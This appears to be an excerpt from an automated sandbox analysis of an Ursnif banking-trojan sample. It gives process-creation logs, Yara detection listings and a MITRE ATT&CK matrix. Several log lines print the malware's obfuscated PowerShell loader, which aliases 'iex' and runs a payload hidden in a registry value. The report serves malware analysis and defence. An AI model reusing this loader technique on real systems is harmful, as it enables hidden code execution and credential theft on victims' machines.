            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\BackgroundTransferHost.exe "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\6.dll",#1
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wklr4juq\wklr4juq.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknown
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nlbomp32\nlbomp32.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknown
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nigogz4l\nigogz4l.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dtnsoflb\dtnsoflb.cmdline
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uu5u2nmv\uu5u2nmv.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknown
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES451.tmp" "c:\Users\user\AppData\Local\Temp\nigogz4l\CSCB0FB5A4205944E4B1A4F1A7502114E8.TMP"
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES11BF.tmp" "c:\Users\user\AppData\Local\Temp\nlbomp32\CSCD36E4F5AB95F41AC9563905B5139F56.TMP"
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES148E.tmp" "c:\Users\user\AppData\Local\Temp\wklr4juq\CSC206B99537D694137B0FEEBD968CAD59B.TMP"
            Source: C:\Windows\System32\control.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1B16.tmp" "c:\Users\user\AppData\Local\Temp\uu5u2nmv\CSC63445C49B154491498BDD3FB79A78AC.TMP"
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: unknown unknown
            Source: C:\Windows\System32\control.exeProcess created: unknown unknown
            Source: C:\Windows\System32\control.exeProcess created: unknown unknown
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00F1A303 cpuid
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00F13A79 HeapFree,GetSystemTimeAsFileTime,HeapFree,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00F14638 GetVersion,lstrcat,lstrcat,lstrcat,GetLastError,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00F1A303 RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,

            Stealing of Sensitive Information:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000004.00000003.364280068.000000000557D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.316367709.00000000059A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.482173365.000000000557D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.364396735.000000000507D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.317676885.00000000039A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.363061307.000000000372D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.482158894.000000000572D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.418329153.0000000005C78000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.363790330.000000000572D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.340116197.000000000517B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.316726446.00000000057F8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.363641305.000000000507D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.434428828.0000000004A88000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.418350281.0000000006148000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.316760481.00000000052F8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.487230410.000000000507D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.364605530.000000000372D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.364538773.000000000572D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.339988265.000000000567B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.362673696.000000000557D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.364182389.000000000372D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.364803620.000000000507D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.418338276.0000000006518000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.339523552.000000000582B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.340805268.000000000382B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.487250466.000000000372D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.365593483.000000000557D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.362522995.000000000572D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 6360, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 6388, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6400, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6424, type: MEMORYSTR

            Remote Access Functionality:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000004.00000003.364280068.000000000557D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.316367709.00000000059A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.482173365.000000000557D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.364396735.000000000507D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.317676885.00000000039A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.363061307.000000000372D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.482158894.000000000572D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.418329153.0000000005C78000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.363790330.000000000572D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.340116197.000000000517B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.316726446.00000000057F8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.363641305.000000000507D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.434428828.0000000004A88000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.418350281.0000000006148000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.316760481.00000000052F8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.487230410.000000000507D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.364605530.000000000372D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.364538773.000000000572D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.339988265.000000000567B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.362673696.000000000557D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.364182389.000000000372D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.364803620.000000000507D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.418338276.0000000006518000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.339523552.000000000582B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.340805268.000000000382B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.487250466.000000000372D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.365593483.000000000557D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.362522995.000000000572D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 6360, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 6388, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6400, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6424, type: MEMORYSTR

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsWindows Management Instrumentation2DLL Side-Loading1DLL Side-Loading1Obfuscated Files or Information1OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsCommand and Scripting Interpreter1Boot or Logon Initialization ScriptsProcess Injection511DLL Side-Loading1LSASS MemoryAccount Discovery1Remote Desktop ProtocolEmail Collection1Exfiltration Over BluetoothEncrypted Channel11Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Masquerading1Security Account ManagerFile and Directory Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Virtualization/Sandbox Evasion21NTDSSystem Information Discovery25Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection511LSA SecretsQuery Registry1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonRegsvr321Cached Domain CredentialsSecurity Software Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsRundll321DCSyncVirtualization/Sandbox Evasion21Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemProcess Discovery2Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
            Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowApplication Window Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
            Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork SniffingSystem Owner/User Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
            Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronRight-to-Left OverrideInput CaptureRemote System Discovery1Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
